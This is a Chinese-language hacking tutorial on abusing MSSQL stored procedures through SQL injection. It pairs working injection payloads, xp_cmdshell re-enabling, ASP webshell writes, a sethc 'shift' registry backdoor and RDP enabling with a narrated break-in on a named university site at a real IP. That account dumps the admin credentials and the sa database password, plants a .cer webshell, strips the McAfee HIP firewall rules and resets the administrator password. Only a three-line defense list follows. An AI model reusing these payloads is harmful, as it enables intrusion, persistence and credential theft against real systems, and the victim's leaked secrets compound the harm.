存儲(chǔ)過(guò)程為數(shù)據(jù)庫(kù)提供了強(qiáng)大的功能，其類似UDF，在MSSQL中xp_cmdshell可謂臭名昭著了。MSSQL強(qiáng)大的存儲(chǔ)過(guò)程也為黑客提供了遍歷，在相應(yīng)的權(quán)限下，攻擊者可以利用不同的存儲(chǔ)過(guò)程執(zhí)行不同的高級(jí)功能，如增加MSSQL數(shù)據(jù)庫(kù)用戶，枚舉文件目錄等等。而這些系統(tǒng)存儲(chǔ)過(guò)程中要數(shù)xp_cmdshell最強(qiáng)大，通過(guò)該存儲(chǔ)過(guò)程可以在數(shù)據(jù)庫(kù)服務(wù)器中執(zhí)行任意系統(tǒng)命令。MSSQL2005,2008等之后版本的MSSQL都分別對(duì)系統(tǒng)存儲(chǔ)過(guò)程做了權(quán)限控制以防止被濫用。

EXEC?master.dbo.xp_cmdshell?'ipconfig'?

xp_cmdshell默認(rèn)在mssql2000中是開啟的，在mssql2005之后的版本中則默認(rèn)禁止。如果用戶擁有管理員sa權(quán)限則可以用sp_configure重修開啟它。

EXEC?sp_configure?'show?advanced?options',1//允許修改高級(jí)參數(shù)RECONFIGUREEXEC?sp_configure?'xp_cmdshell',1??//打開xp_cmdshell擴(kuò)展RECONFIGURE?

開啟后執(zhí)行語(yǔ)句

除了xp_cmdshell還有操作注冊(cè)表的

xp_regaddmultistringxp_regdeletekey?//刪除鍵xp_regdeletevalue?//刪除值xp_regenumkeysxp_regenumvalues?//返回多個(gè)值xp_regread?//讀取鍵值xp_regremovemultistringxp_regwrite?//寫入鍵值?控制服務(wù)的xp_servicecontrol等開啟telnet服務(wù)execmaster..xp_servicecontrol?'start',?'tlntsvr'?

測(cè)試

/2.aspx?id=999999.9+union+all+select+%28select+cast%28Char%28114%29%2bChar%2851%29%2bChar%28100%29%2bChar%28109%29%2bChar%2848%29%2bChar%28118%29%2bChar%2851%29%2bChar%2895%29%2bChar%28104%29%2bChar%28118%29%2bChar%28106%29%2bChar%2895%29%2bChar%28105%29%2bChar%28110%29%2bChar%28106%29%2bChar%28101%29%2bChar%2899%29%2bChar%28116%29%2bChar%28105%29%2bChar%28111%29%2bChar%28110%29+as+nvarchar%284000%29%29%29%2Cnull%2Cnull--?

url解碼

刪除空格+，轉(zhuǎn)換Asc，比較簡(jiǎn)單的語(yǔ)句就不注釋了

id=999999.9+union+all+select+(select+cast(Char(114)+Char(51)+Char(100)+Char(109)+Char(48)+Char(118)+Char(51)+Char(95)+Char(104)+Char(118)+Char(106)+Char(95)+Char(105)+Char(110)+Char(106)+Char(101)+Char(99)+Char(116)+Char(105)+Char(111)+Char(110)+as+nvarchar(4000))),null,null--?

cast字符類型轉(zhuǎn)換

CAST?(?expression?AS?data_type?[?(?length?)?]?)id=999999.9?union?all?select?(select?cast(r3dm0v3_hvi_iniectionas?nvarchar(4000))),null,null—//相當(dāng)于?select?r3dm0v3_hvi_iniection,null,null--?/2.aspx?id=999999.9+union+all+select+null,char(126)+char(39)+cast(db_name()+COLLATE+SQL_Latin1_General_Cp1254_CS_AS+as+nvarchar(4000))+char(39)+char(126),null--?

獲取當(dāng)前數(shù)據(jù)庫(kù)名字

/2.aspxid=999999.9+union+all+select+null,~'cast(db_name()COLLATE?SQL_Latin1_General_Cp1254_CS_AS/*進(jìn)行排序，并轉(zhuǎn)換成nvarchar類型*/?as?nvarchar(4000))'~,null--?開啟xp_cmdshell/2.aspxid=1;EXEC?sp_configure?'show?advancedoptions',1;RECONFIGURE;EXEC?sp_configure?'xp_cmdshell',1;RECONFIGURE--?

OleAutomation?Procedures

/2.aspx?id=1;exec+sp_configure+'show+advanced+options',1;RECONFIGURE;exec+sp_configure+'Ole+Automation+Procedures',1;RECONFIGURE--?

執(zhí)行命令

1，創(chuàng)建一個(gè)包含兩個(gè)字段tmp1，tmp2的r3dm0v3_sql表

/2.aspxid=1;+CREATE+TABLE+r3dm0v3_sql+(tmp1+varchar(8000),tmp2+varchar(8000))--?

2，將執(zhí)行結(jié)果存入tmp1表中

/2.aspxid=1;+insert+into+r3dm0v3_sql+(tmp1)+exec+master..xp_cmdshell+'net+user'—?

3，存儲(chǔ)過(guò)程，將tmp1字段中所有不為空內(nèi)容讀取到tmp2字段中，并在前面加入~。

/2.aspxid=1;begindeclare?@ret?varchar(8000)set?@ret=''select?@ret=@ret?'~'?tmp1?from?r3dm0v3_sqlwhere?tmp1>@ret?insert?into?r3dm0v3_sql(tmp2)select?@retend--?

4，從tmp2表中查詢不為空的數(shù)據(jù)，Havij會(huì)在查詢的數(shù)據(jù)前后加入~'數(shù)據(jù)內(nèi)容'~，這也是他的一個(gè)特點(diǎn)。

/2.aspx?id=999999.9+union+all+select+null,(select+top+1+char(126)+char(39)+cast(tmp2+as+varchar(8000))+COLLATE+SQL_Latin1_General_Cp1254_CS_AS+char(39)+char(126)+from+r3dm0v3_sql+where+tmp2<>''),null--?

5，刪除表

/2.aspx?id=1%3B+drop+table+r3dm0v3_sql--?

高級(jí)入侵

不過(guò)當(dāng)用戶已AUTHORITY\NetworkService登陸時(shí)時(shí)（mssql2005express版默認(rèn)）無(wú)法執(zhí)行net?user命令添加用戶的，不過(guò)默認(rèn)安裝的mssql2005企業(yè)版是以本地系統(tǒng)賬戶登陸的

當(dāng)以本地用戶登錄的時(shí)候執(zhí)行命令?

sp_makewebtask寫入一句話?

如果未啟用Web?Assistant?Procedures?

SQLServer?阻止了對(duì)組件?'WebAssistant?Procedures'?的?過(guò)程'sys.xp_makewebtask'?的訪問(wèn)，因?yàn)榇私M件已作為此服務(wù)器安全配置的一部分而被關(guān)閉。

開啟

exec?sp_configure?'Web?AssistantProcedures',?1;?RECONFIGURE?

寫碼

exec?sp_makewebtask?'c:\1.asp','select''<%execute(request("ruo"))%>'''<HTML><HEAD><META?content="text/html;charset=utf-8"?http-equiv=Content-Type><TITLE>Microsoft?SQL?Server?Web?助手</TITLE></HEAD><BODY><H1>查詢結(jié)果</H1><HR><PRE><TT>上次更新時(shí)間:?2014-12-2511:36:23.560</TT></PRE><P><P><TABLE?BORDER=1><TR><THALIGN=LEFT>n/a</TH></TR><TR><TD><TT><%execute(request("ruo"))%></TT></TD></TR></TABLE><HR></BODY></HTML>?

一條語(yǔ)句寫入文件到c:\1.asp

http://192.168.1.145/2.aspx?id=2;exec?sp_configure0x730068006f007700200061006400760061006e0063006500640020006f007000740069006f006e007300/*showadvanced?options*/,?1;reconfigure;exec?sp_configure0x570065006200200041007300730069007300740061006e0074002000500072006f006300650064007500720065007300/*Web?Assistant?Procedures*/,1;reconfigure;declare?@snvarchar(4000);select@s=0x730065006c00650063007400200027003c00250045007800650063007500740065002800720065007100750065007300740028002200720075006f0022002900290025003e000d000a002700/*select?'<%Execute(request("ruo"))%>?'*/;execsp_makewebtask?0x43003a005c0031002e00610073007000/*C:\1.asp*/,?@s;--?

如果存儲(chǔ)過(guò)程xp_cmdshell被刪除，重修加載,如果是xplog70.dll文件被刪除了還是別想了吧

dbcc?addextendedproc("sp_oacreate","odsole70.dll")dbcc?addextendedproc("xp_cmdshell","xplog70.dll")?

如果模塊不存在

消息17750，級(jí)別16，狀態(tài)0，過(guò)程xp_makewebtask，第1?行無(wú)法加載DLL?xpweb90.dll?或它引用的一個(gè)DLL。原因:126(找不到指定的模塊。)。?

mssql2005?express版的缺少一些組件，寫入文件時(shí)無(wú)法加載xpweb90.dll，拖入mssql2005企業(yè)版xpweb.dll無(wú)法加載，這個(gè)版本不知怎么寫入文件。

以本地系統(tǒng)賬戶登陸

消息17750，級(jí)別16，狀態(tài)0，過(guò)程xp_makewebtask，第1?行無(wú)法加載DLL?xpweb90.dll?或它引用的一個(gè)DLL。原因:1114(動(dòng)態(tài)鏈接庫(kù)(DLL)初始化例程失敗。)。?

網(wǎng)絡(luò)賬戶NT?AUTHORITY\NetworkService

消息17750，級(jí)別16，狀態(tài)0，過(guò)程xp_makewebtask，第1?行無(wú)法加載DLL?xpweb90.dll?或它引用的一個(gè)DLL。原因:?5(拒絕訪問(wèn)。)。?

注冊(cè)表操作?

啟用存儲(chǔ)過(guò)程

exec?sp_addextendedprocxp_regread,'xpstar.dll'http://192.168.1.145/2.aspx?id=2;exec?master.dbo.sp_addextendedproc0x780070005f007200650067007200650061006400,0x7800700073007400610072002e0064006c006c00--?

xp_regread?à?16進(jìn)制78?70?5F?72?65?67?72?65?61?64

讀取鍵值計(jì)算機(jī)名

xp_regread?根鍵,子鍵,鍵值名

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ComputerNameComputerName?

建表

http://192.168.1.145/2.aspx?id=2?;createtable?[pangolin_test_table]([a]?nvarchar(4000)?null);--?

讀取值并寫入到表中

http://192.168.1.145/2.aspx?id=2;declare?@s?nvarchar(4000)exec?master.dbo.xp_regread0x484b45595f4c4f43414c5f4d414348494e45/*表項(xiàng)HKEY_LOCAL_MACHINE*/,0x53595354454d5c436f6e74726f6c5365743030315c436f6e74726f6c5c436f6d70757465724e616d655c436f6d70757465724e616d65/*子項(xiàng)SYSTEM\ControlSet001\Control\ComputerName\ComputerName*/,0x436f6d70757465724e616d65/*健名ComputerName*/,@s?outputinsert?intopangolin_test_table?(a)values(@s);--?

查詢

http://192.168.1.145/2.aspx?id=2?and(select?top?1?a?from?pangolin_test_table)>0--http://192.168.1.145/2.aspx?id=2?;droptable?[pangolin_test_table];--?

注：子項(xiàng)路徑中有空格沒法找到路徑

寫入注冊(cè)表值

xp_regwrite?根鍵,子鍵,?值名,?值類型,?值

exec?xp_regwrite

0x484b45595f4c4f43414c5f4d414348494e45/*HKEY_LOCAL_MACHINE*/,0x534f4654574152455c4d6963726f736f66745c57696e646f77735c43757272656e7456657273696f6e5c52756e/*SOFTWARE\Microsoft\Windows\CurrentVersion\Run?*/,0x74657374/*test*/,0x5245475f535a/*REG_SZ*/,?

'c:\2.exe'?—?/*?mssql2005?express版我測(cè)試這里不能用十六進(jìn)制的格式了，不然會(huì)出現(xiàn)錯(cuò)誤執(zhí)行xp_regwrite?擴(kuò)展存儲(chǔ)過(guò)程時(shí)出錯(cuò):?注冊(cè)表REG_(MULTI)_SZ?值不匹配*/

寫入shift后門

exec?xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image?File?Execution?Options\sethc.exe','debugger','REG_SZ','c:\\windows\\system32\\taskmgr.exe'?

16進(jìn)制編碼

exec?xp_regwrite0x484b45595f4c4f43414c5f4d414348494e45,0x534f4654574152455c4d6963726f736f66745c57696e646f7773204e545c43757272656e7456657273696f6e5c496d6167652046696c6520457865637574696f6e204f7074696f6e735c73657468632e657865,0x6465627567676572,0x5245475f535a,?

'c:\\windows\\system32\\taskmgr.exe'–

查看遠(yuǎn)程桌面開啟

exec?xp_regread'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\TerminalServer','fDenyTSConnections'?

開啟遠(yuǎn)程桌面

exec?xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\TerminalServer','fDenyTSConnections','REG_DWord',0?

入侵實(shí)例

西南明大招生就業(yè)網(wǎng)

http://222.210.17.165/selects.asp?Key=1

后臺(tái)

http://222.210.17.165/admin/login.asp?

web?server?operating?system:?Windows?2003or?XPweb?application?technology:?ASP.NET,Microsoft?IIS?6.0,?ASPback-end?DBMS:?Microsoft?SQL?Server?2005?

Database:?zsweb

[33?tables]

+---------------------------------------------------+|?ArtWebStudent?????????????????????????????????????||?D99_CMD???????????????????????????????????????????||?D99_REG???????????????????????????????????????????||?D99_Tmp???????????????????????????????????????????||?DIY_TEMPCOMMAND_TABLE?????????????????????????????||?KS_AdminX（管理員表）?????????????????????????????????????????||?KS_Cls????????????????????????????????????????????||?KS_Down???????????????????????????????????????????||?KS_GuestBook??????????????????????????????????????||?KS_Job????????????????????????????????????????????||?KS_Mail???????????????????????????????????????????||?KS_Member?????????????????????????????????????????||?KS_News???????????????????????????????????????????||?KS_P_Str??????????????????????????????????????????||?KS_P_Text?????????????????????????????????????????||?KS_Page???????????????????????????????????????????||?KS_Person?????????????????????????????????????????||?KS_Pro????????????????????????????????????????????||?KS_VoteOption?????????????????????????????????????||?KS_VoteTopic??????????????????????????????????????||?LqHistory?????????????????????????????????????????||?Plan??????????????????????????????????????????????||?Student???????????????????????????????????????????||?WebBm?????????????????????????????????????????????||?area??????????????????????????????????????????????||?class?????????????????????????????????????????????||?comd_list?????????????????????????????????????????||?dtproperties??????????????????????????????????????||?labeng????????????????????????????????????????????||?major?????????????????????????????????????????????||?majorsubject??????????????????????????????????????||?province??????????????????????????????????????????||?subject???????????????????????????????????????????|+---------------------------------------------------+?

sqlmap.py?-u"http://222.210.17.165/selects.asp?key=1"?-D?zsweb?-T?KS_AdminX?–columns

Database:?zsweb

Table:?KS_AdminX

[7?columns]

+---------------+---------------+|?Column????????|?Type??????????|+---------------+---------------+|?AddTime???????|?smalldatetime?||?ID????????????|?int???????????||?LastLoginIP???|?varchar???????||?LastLoginTime?|?smalldatetime?||?UserLoginName?|?varchar???????||?UserLoginPWD??|?varchar???????||?UserRealName??|?varchar???????|+---------------+---------------+sqlmap.py?-u"http://222.210.17.165/selects.asp?key=1"?-D?zsweb?-T?KS_AdminX?–CUserLoginName,?UserLoginPWD?--dump?

Database:?zsweb

Table:?KS_AdminX

[1?entry]

+--------------+---------------+|?UserLoginPWD?|?UserLoginName?|+--------------+---------------+|?859911???????|?admin?????????|+--------------+---------------+?

后臺(tái)沒發(fā)下可以利用的地方

sqlmap.py?-u?http://222.210.17.165/selects.asp?key=1--os-shell?

通過(guò)后臺(tái)上傳圖片文件，再dir目錄查看文件內(nèi)容，確定D:\web\為網(wǎng)站目錄

網(wǎng)站絕對(duì)路徑

D:\web\?ewebeditor\uploadfile\20141226165819600.jpeghttp://222.210.17.165/ewebeditor/uploadfile/20141226165819600.jpeg?

d:\web?的目錄

2014-11-08?09:26????<DIR>??????????.2014-11-08?09:26????<DIR>??????????..2012-12-19?00:40?????????????4,991?about.asp2009-04-20?03:37?????????????4,013aboutTemp.asp2009-04-20?03:37????????????10,451?aboutW.asp2014-11-06?13:08????<DIR>??????????Admin2010-01-12?20:26?????????????4,846ArtBkxz.asp2010-01-09?11:14?????????????2,280artbmleft.asp2010-01-09?13:04???????????????650artbmlogin.asp2010-01-09?13:46?????????????9,382ArtBmPrint.asp2013-09-21?20:27????<DIR>??????????aspnet_client2009-04-10?11:21????????????11,036?bkgl.asp2010-01-09?21:44????????????12,507?BmOk.asp2009-04-07?18:31???????????????419?boot.htm2009-03-15?16:49???????????????424?close.html2010-01-04?14:39???????????????149?conn.asp2009-04-20?03:48???????????????952contact.asp2009-04-22?22:39?????????????1,567?css.css2008-07-03?11:09?????????????1,274?css1.css2013-09-21?20:27????<DIR>??????????DataBaseJKZY2014-07-29?00:38????<DIR>??????????ewebeditor2009-04-10?11:21????????????11,042?gkkx.asp2011-03-22?16:56?????????????4,687gklqcxn.asp2010-01-07?13:34????????????14,807?head.asp2014-10-20?01:36????<DIR>??????????images2014-10-20?01:36????<DIR>??????????Include?

目錄文件太多了省略一萬(wàn)字….

寫入文件

Echo?imruo?>>?d:\web\zhao\1.txt?不能寫入asp，asa文件?aspx文件無(wú)法執(zhí)行，沒有注冊(cè).net

查看進(jìn)程，發(fā)現(xiàn)McAfee安全軟件

Tasklist

映像名稱???????????????????????PID?會(huì)話名??????????????會(huì)話#???????內(nèi)存使用=========================?========================?===========?============System?Idle?Process??????????????0?Console????????????????????0?????????28?KSystem???????????????????????????4?Console????????????????????0????????312?Ksmss.exe???????????????????????412?Console????????????????????0????????564?Kcsrss.exe??????????????????????468?Console????????????????????0??????6,896?Kwinlogon.exe???????????????????492?Console????????????????????0?????43,556?Kservices.exe???????????????????540?Console????????????????????0?????28,700?Klsass.exe??????????????????????552?Console????????????????????0?????37,548?Ksvchost.exe????????????????????724?Console????????????????????0?????18,200?KFireSvc.exe???????????????????//?McAfeeDesktopFirewall防火墻服務(wù)進(jìn)程inetinfo.exe??????????????????1096?Console????????????????????0?????36,732?KFrameworkService.exe??????????1148?Console????????????????????0??????1,772?KVsTskMgr.exe??????????????????//?McAfeemfevtps.exe???????????????????1320?Console????????????????????0??????5,808?Kmfeann.exe????????????????????1340?Console????????????????????0??????3,640?KnaPrdMgr.exe??????????????????//?McAfeesqlservr.exe??????????????????1544?Console????????????????????0??1,178,252?Kmsmdsrv.exe???????????????????1556?Console????????????????????0?????24,968?Ksvchost.exe???????????????????1684?Console????????????????????0?????30,436?Kvmware-converter-a.exe????????1752?Console????????????????????0?????44,052?Kvmware-converter.exe??????????1824?Console????????????????????0?????42,764?Kvmware-converter.exe??????????1912?Console????????????????????0?????47,268?Ksvchost.exe???????????????????1948?Console????????????????????0?????18,148?Ksearchindexer.exe?????????????1972?Console????????????????????0??????7,728?Kmcshield.exe??????????????????//?McAfee?VirusScan?的一個(gè)核心進(jìn)程mfefire.exe???????????????????//?mcafee網(wǎng)絡(luò)安全程序msftesql.exe??????????????????2184?Console????????????????????0??????4,564?Kwmiprvse.exe??????????????????3580?Console????????????????????0??????5,660?Klogon.scr????????????????????//屏保程序w3wp.exe?????????????????????2172Console????????????????????0?????30,708?Kdavcdata.exe??????????????????//?Microsoft?HTTP-DAV?commondata?

嘗試寫入cer,竟然可以執(zhí)行，哈哈，上菜刀了

Echo?"<%Execute(request("a"))%>">>?d:\web\zhao\1.cer?(備份D:\web\Admin\Images\1.cer)

數(shù)據(jù)庫(kù)連接文件

D:\web\conn.asp<%'數(shù)據(jù)庫(kù)連接Setwebconn=CreateObject("ADODB.Connection")webconn.Open?"DRIVER={SQLServer};server=(local);uid=sa;pwd=000000;database=zsweb"%>?

服務(wù)器提權(quán)

開啟3389導(dǎo)入shift后門

菜刀上傳開啟3389reg，xp_shell導(dǎo)入遠(yuǎn)程桌面仍然無(wú)法連接

Regedit?/s?d:\web\rdp.reg?

導(dǎo)出注冊(cè)表

regedit?/e?d:\web\zhao\aaa.reg?"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp"?

主機(jī)裝有McAfee?Host?Intrusion?Prevention，本地測(cè)試下載到到的版本，發(fā)現(xiàn)目標(biāo)用的是8.0的，然后考慮將配置文件下載下來(lái)覆蓋本地的查看服務(wù)器hip規(guī)則，無(wú)意中發(fā)現(xiàn)某站提到mcafee?hip配置文件在注冊(cè)表中HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\HIP，導(dǎo)出注冊(cè)表覆蓋本地發(fā)現(xiàn)3389訪問(wèn)限制了ip

既然通過(guò)注冊(cè)表配置，那么我將遠(yuǎn)程ip地址修改后再導(dǎo)入注冊(cè)表不就繞過(guò)了ip的限制了，想想連我都佩服我的機(jī)智。

Windows?Registry?Editor?Version?5.00[HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\HIP\Config\Firewall\AggrMatches\4\Matches]"0"="15,1,0,false,false,true,221.10.*.*,,"?

不過(guò)測(cè)試還是無(wú)法連接，研究發(fā)現(xiàn)防火墻由兩條注冊(cè)表Matches，Rules決定，修改起來(lái)比較麻煩，還是將目標(biāo)注冊(cè)表規(guī)則刪除，導(dǎo)入我們本地建立的吧。

reg?delete?HKLM\SOFTWARE\McAfee?/fRegedit?/s?d:\web\zhao\hip.reg?

突破3389過(guò)濾后我們導(dǎo)入shift后門吧

Regedit?/s?d:\web\zhao\shift.reg?

登陸權(quán)限為system權(quán)限，直接打開用戶管理修改administrator密碼

現(xiàn)在我是管理員了，想干什么就干什么了，呵呵呵。

如何防范？

1，刪除存儲(chǔ)過(guò)程execsp_dropextendedproc?‘xp_cmdshell’，最好刪除xplog70.dll等文件2，網(wǎng)站數(shù)據(jù)庫(kù)不要使用sa賬戶，對(duì)服務(wù)運(yùn)行權(quán)限設(shè)定為普通賬戶3，安裝相關(guān)安全軟件?